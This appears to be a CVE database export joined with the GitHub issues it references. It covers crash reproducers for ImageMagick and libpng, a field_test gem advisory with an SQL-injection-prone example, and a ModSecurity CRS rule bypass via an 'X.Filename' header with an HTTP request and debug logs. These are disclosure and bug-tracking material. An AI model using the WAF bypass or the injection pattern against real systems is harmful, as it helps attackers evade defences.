"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/109099" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/1ddcf2e4f28029a888cadef2e757509ef5047ad8" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1629" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/4f31d78716ac94c85c244efcea368fea202e2ed4" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-08/msg00069.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/109099" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/1ddcf2e4f28029a888cadef2e757509ef5047ad8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1629" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick6/commit/4f31d78716ac94c85c244efcea368fea202e2ed4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4192-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:7.0.8-54:q16:*:*:*:*:*:*", "matchCriteriaId": "9A2BD25B-C7E9-4B57-BF88-0C86D9D3C318", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:lts:*:*:*", "matchCriteriaId": "F7016A2A-8365-4F1A-89A2-7A19F2BCAE5B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:18.04:*:*:*:lts:*:*:*", "matchCriteriaId": "23A7C53F-B80F-4E6A-AFA9-58EEA84BE11D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.04:*:*:*:*:*:*:*", "matchCriteriaId": "CD783B0C-9246-47D9-A937-6144FE8BFF0F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:19.10:*:*:*:*:*:*:*", "matchCriteriaId": "A31C8344-3E02-4EB8-8BD8-4C84B7959624", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:leap:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "F1E78106-58E6-4D59-990F-75DA575BFAD9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "369" ]
369
https://github.com/ImageMagick/ImageMagick/issues/1629
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [x] I have verified that I am using the latest version of ImageMagick - [x] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There's a division by zero at MagickCore/layer.c:1616:30 ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> run following cmd: `magick "-seed" "0" "-delay" "34<" "(" "magick:rose" "+repage" ")" "(" "magick:rose" "+repage" ")" "-encoding" "Symbol" "-layers" "remove-dups" "-quiet" "tmp"` This is triggered at `time = curr->delay*1000/curr->ticks_per_second;` due to curr->ticks_per_second. ``` 1605 for (; (next=GetNextImageInList(curr)) != (Image *) NULL; curr=next) 1606 { 1607 if ( curr->columns != next->columns || curr->rows != next->rows 1608 || curr->page.x != next->page.x || curr->page.y != next->page.y ) 1609 continue; 1610 bounds=CompareImagesBounds(curr,next,CompareAnyLayer,exception); 1611 if ( bounds.x < 0 ) { 1612 /* 1613 the two images are the same, merge time delays and delete one. 1614 */ 1615 size_t time; 1616 time = curr->delay*1000/curr->ticks_per_second; 1617 time += next->delay*1000/next->ticks_per_second; 1618 next->ticks_per_second = 100L; 1619 next->delay = time*curr->ticks_per_second/1000; 1620 next->iterations = curr->iterations; 1621 *images = curr; 1622 (void) DeleteImageFromList(images); 1623 } 1624 } ``` Here's USAN log. ``` MagickCore/layer.c:1616:30: runtime error: division by zero SUMMARY: UndefinedBehaviorSanitizer: undefined-behavior MagickCore/layer.c:1616:30 in AddressSanitizer:DEADLYSIGNAL ================================================================= ==28916==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x7fe11baee9e7 bp 0x7ffc60e12250 sp 0x7ffc60e11ec0 T0) #0 0x7fe11baee9e6 in RemoveDuplicateLayers MagickCore/layer.c:1616:30 #1 0x7fe11a2600a8 in CLIListOperatorImages MagickWand/operation.c:4266:15 #2 0x7fe11a273102 in CLIOption MagickWand/operation.c:5308:14 #3 0x7fe119c6aef4 in ProcessCommandOptions MagickWand/magick-cli.c:477:7 #4 0x7fe119c6dc54 in MagickImageCommand MagickWand/magick-cli.c:796:5 #5 0x7fe119d1400e in MagickCommandGenesis MagickWand/mogrify.c:185:14 #6 0x527976 in MagickMain utilities/magick.c:149:10 #7 0x5268e1 in main utilities/magick.c:180:10 #8 0x7fe113884b96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b069 in _start (install/bin/magick+0x41b069) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: UNKNOWN SIGNAL MagickCore/layer.c:1616:30 in RemoveDuplicateLayers ==28916==ABORTING ``` ### System Configuration <!-- Tell us about the environment where you are experiencing the bug --> - ImageMagick version: Version: ImageMagick 7.0.8-54 Q16 x86_64 2019-07-07 https://imagemagick.org - Environment (Operating system, version and so on): Description: Ubuntu 18.04.1 LTS Release: 18.04 Codename: bionic - Additional information: CC=clang-7 CXX=clang++-7 CFLAGS="-fsanitize=address,undefined -g" CXXFLAGS="-fsanitize=address,undefined -g" ./configure --disable-openmp --without-png <!-- Thanks for reporting the issue to ImageMagick! -->
Division by Zero at MagickCore/layer.c:1616
https://api.github.com/repos/ImageMagick/ImageMagick/issues/1629/comments
4
2019-07-07T02:34:55Z
2019-08-18T16:37:24Z
https://github.com/ImageMagick/ImageMagick/issues/1629
464,908,207
1,629
507
CVE-2019-13146
2019-07-09T18:15:11.513
The field_test gem 0.3.0 for Ruby has unvalidated input. A method call that is expected to return a value from a certain set of inputs can be made to return any input, which can be dangerous depending on how applications use it. If an application treats arbitrary variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross-site scripting (XSS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/109114" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/17" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://rubygems.org/gems/field_test" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "http://www.securityfocus.com/bid/109114" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ankane/field_test/issues/17" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://rubygems.org/gems/field_test" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:field_test_project:field_test:0.3.0:*:*:*:*:ruby:*:*", "matchCriteriaId": "9B5B13A5-62A8-41DA-A979-BA3AC2A9B49F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/ankane/field_test/issues/17
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ankane", "field_test" ]
Due to unvalidated input, an attacker can pass in arbitrary variants via query parameters. This vulnerability has been assigned the CVE identifier CVE-2019-13146. Versions Affected: 0.3.0 Fixed Versions: 0.3.1 Versions Unaffected: < 0.3.0 ## Impact If an application treats variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross-site scripting (XSS). For instance: ```ruby landing_page = field_test(:landing_page) Page.where("key = '#{landing_page}'") ``` All users running an affected release should upgrade immediately.
Arbitrary Variants Via Query Parameters in Field Test 0.3.0
https://api.github.com/repos/ankane/field_test/issues/17/comments
1
2019-07-02T00:11:16Z
2019-07-18T09:57:16Z
https://github.com/ankane/field_test/issues/17
462,962,501
17
508
CVE-2019-13464
2019-07-09T19:15:12.560
An issue was discovered in OWASP ModSecurity Core Rule Set (CRS) 3.0.2. Use of X.Filename instead of X_Filename can bypass some PHP Script Uploads rules, because PHP automatically transforms dots into underscores in certain contexts where dots are invalid.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.0" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV31": null, "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1391" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/1391" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:modsecurity:owasp_modsecurity_core_rule_set:3.0.2:*:*:*:*:*:*:*", "matchCriteriaId": "2D370E47-9CCB-4C3C-A480-7365594E47A9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386
[ "Exploit", "Third Party Advisory" ]
github.com
[ "SpiderLabs", "owasp-modsecurity-crs" ]
## Type of Issue incorrect bypass (false negative) ## Description I bypassed this pull issue [#355](https://github.com/SpiderLabs/owasp-modsecurity-crs/pull/355) In rule id = 933110, This behavior return true ``` [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][5] Rule 7f05037de688: SecRule "FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name" "@rx .*\\.(?:php\\d*|phtml)\\.*$" "phase:2,log,auditlog,id:933110,block,capture,t:none,t:lowercase,msg:'PHP Injection Attack: PHP Script File Upload Found',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:application-multi,tag:language-php,tag:platform-multi,tag:attack-injection-php,tag:OWASP_CRS/WEB_ATTACK/PHP_INJECTION,tag:OWASP_TOP_10/A1,ctl:auditLogParts=+E,ver:OWASP_CRS/3.1.0,severity:CRITICAL,setvar:tx.msg=%{rule.msg},setvar:tx.php_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score_pl1=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{MATCHED_VAR_NAME}=%{tx.0}" [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] T (0) lowercase: "test.php." [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][4] Transformation completed in 2 usec. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][4] Executing operator "rx" with param ".*\\.(?:php\\d*|phtml)\\.*$" against REQUEST_HEADERS:X_Filename. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Target value: "test.php." [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Added regex subexpression to TX.0: test.php. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][4] Operator completed in 5 usec. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][4] Ctl: Set auditLogParts to ABIJDEFHZE. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Setting variable: tx.msg=%{rule.msg} [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{rule.msg} to: PHP Injection Attack: PHP Script File Upload Found [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Set variable "tx.msg" to "PHP Injection Attack: PHP Script File Upload Found". [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Setting variable: tx.php_injection_score=+%{tx.critical_anomaly_score} [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Recorded original collection variable: tx.php_injection_score = "0" [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Relative change: php_injection_score=0+ [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Set variable "tx.php_injection_score" to "0". [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Setting variable: tx.anomaly_score_pl1=+%{tx.critical_anomaly_score} [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Recorded original collection variable: tx.anomaly_score_pl1 = "0" [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Relative change: anomaly_score_pl1=0+ [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Set variable "tx.anomaly_score_pl1" to "0". [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Setting variable: tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{MATCHED_VAR_NAME}=%{tx.0} [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{rule.id} to: 933110 [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{MATCHED_VAR_NAME} to: REQUEST_HEADERS:X_Filename [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{tx.0} to: test.php. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Set variable "tx.933110-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-REQUEST_HEADERS:X_Filename" to "test.php.". [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{TX.0} to: test.php. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{MATCHED_VAR_NAME} to: REQUEST_HEADERS:X_Filename [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Resolved macro %{MATCHED_VAR} to: test.php. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][2] Warning. Pattern match ".*\\.(?:php\\d*|phtml)\\.*$" at REQUEST_HEADERS:X_Filename. [file "/etc/modsecurity/rules/owasp-modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "111"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: test.php. found within REQUEST_HEADERS:X_Filename: test.php."] [severity "CRITICAL"] [ver "OWASP_CRS/3.1.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][4] Rule returned 1. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8ab0a0][/][9] Match -> mode NEXT_RULE. ``` But, by replacing `X_Filename` to `X.Filename` ``` [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8a90a0][/][5] Rule 7f05037de688: SecRule "FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X-File-Name" "@rx .*\\.(?:php\\d*|phtml)\\.*$" "phase:2,log,auditlog,id:933110,block,capture,t:none,t:lowercase,msg:'PHP Injection Attack: PHP Script File Upload Found',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:application-multi,tag:language-php,tag:platform-multi,tag:attack-injection-php,tag:OWASP_CRS/WEB_ATTACK/PHP_INJECTION,tag:OWASP_TOP_10/A1,ctl:auditLogParts=+E,ver:OWASP_CRS/3.1.0,severity:CRITICAL,setvar:tx.msg=%{rule.msg},setvar:tx.php_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score_pl1=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/WEB_ATTACK/PHP_INJECTION-%{MATCHED_VAR_NAME}=%{tx.0}" [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8a90a0][/][4] Rule returned 0. [] [localhost/sid#7f04f62b5cf8][rid#7f04ff8a90a0][/][9] No match, not chained -> mode NEXT_RULE. ``` in my php application, that understanding`X.Filename` is `X_Filename` - request: ``` GET /test.php HTTP/1.1 Host: localhost Accept: */* X.Filename: test.php.tmp Connection: close ``` - response: ![image](https://user-images.githubusercontent.com/14813954/57173442-395cb600-6e5a-11e9-8bcf-c53b16702109.png) And a rule id = 933111 is the same ## Your Environment I tested my ubuntu 16.04, PHP version 7.3 and the latest version crs (v3.0.2) ## Confirmation [X] I have removed any personal data (email addresses, IP addresses, passwords, domain names) from any logs posted.
Bypass rule PHP Script Uploads with id=933111 and id = 933110
https://api.github.com/repos/SpiderLabs/owasp-modsecurity-crs/issues/1386/comments
2
2019-05-04T03:56:08Z
2019-05-05T13:56:53Z
https://github.com/SpiderLabs/owasp-modsecurity-crs/issues/1386
440,281,528
1,386
509
CVE-2018-14550
2019-07-10T12:15:10.750
An issue has been found in third-party PNM decoding associated with libpng 1.6.35. It is a stack-based buffer overflow in the function get_token in pnm2png.c in pnm2png.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/glennrp/libpng/issues/246" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/201908-02" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221028-0001/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/fouzhe/security/tree/master/libpng#stack-buffer-overflow-in-png2pnm-in-function-get_token" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/glennrp/libpng/issues/246" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/201908-02" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20221028-0001/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuApr2021.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libpng:libpng:1.6.35:*:*:*:*:*:*:*", "matchCriteriaId": "16095D8B-1CDD-478C-BC8D-2D3DFCE3CD1D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:oracle:hyperion_infrastructure_technology:11.1.2.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "37A1E0FB-F706-4FB7-86E1-18268A744A80", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:oracle:mysql_workbench:*:*:*:*:*:*:*:*", "matchCriteriaId": "CB1A94E1-A6C6-488D-A74C-6C0B24637272", "versionEndExcluding": null, "versionEndIncluding": "8.0.23", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*", "matchCriteriaId": "3A756737-1CC4-42C2-A4DF-E1C893B4E2D5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "matchCriteriaId": "5EC98B22-FFAA-4B59-8E63-EBAA4336AD13", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/glennrp/libpng/issues/246
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "glennrp", "libpng" ]
There is an issue in **png2pnm** in **libpng 1.6** . It's a stack-buffer-overflow in png2pnm in function get_token. To compile png2pnm,those command can be used with **Clang 6.0**: ``` export CFLAGS="-g -fsanitize=address" LDFLAGS="-fsanitize=address" CC=clang-6.0 ./autogen.sh ./configure make cd contrib/pngminus/ make -f makefile.std ``` The `makefile.std` in folder `contrib/pngminus` should also be modified before the command `make -f makefile.std` as mention in [this comment](https://github.com/glennrp/libpng/issues/238#issuecomment-404487829): ```diff index 14e25cd64..553bbe354 100644 --- a/contrib/pngminus/makefile.std +++ b/contrib/pngminus/makefile.std @@ -2,7 +2,7 @@ # Linux / Unix #CC=cc -CC=gcc +CC=clang-6.0 LD=$(CC) RM=rm -f @@ -13,18 +13,19 @@ RM=rm -f #PNGLIBS = $(PNGPATH)/lib/libpng16.a PNGINC = -I../.. PNGLIB = -L../.. -lpng -PNGLIBS = ../../libpng.a +PNGLIBS = ../../.libs/libpng16.a -#ZPATH = /usr/local -#ZINC = -I$(ZPATH)/include -#ZLIB = -L$(ZPATH)/lib -lz +ZPATH = /usr/local +ZINC = -I$(ZPATH)/include +ZLIB = -L$(ZPATH)/lib -lz #ZLIBS = $(ZPATH)/lib/libz.a -ZINC = -I../../../zlib -ZLIB = -L../../../zlib -lz -ZLIBS = ../../../zlib/libz.a +#ZINC = -I../../../zlib 